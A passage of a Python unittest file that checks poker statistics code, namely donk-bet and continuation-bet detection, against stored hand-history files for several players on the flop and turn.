self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
def test_db_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
def test_db_raise_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in2gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
def test_enum_db_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual('fold', tmp.enum_db_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual('call', tmp.enum_db_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_db_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_db_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual('fold', tmp.enum_db_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
def test_enum_db_raise_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in2gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
class TestCBet(unittest.TestCase):
def test_cb_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC__T__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XX__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XX__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_cb(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BRRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
def test_cb_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
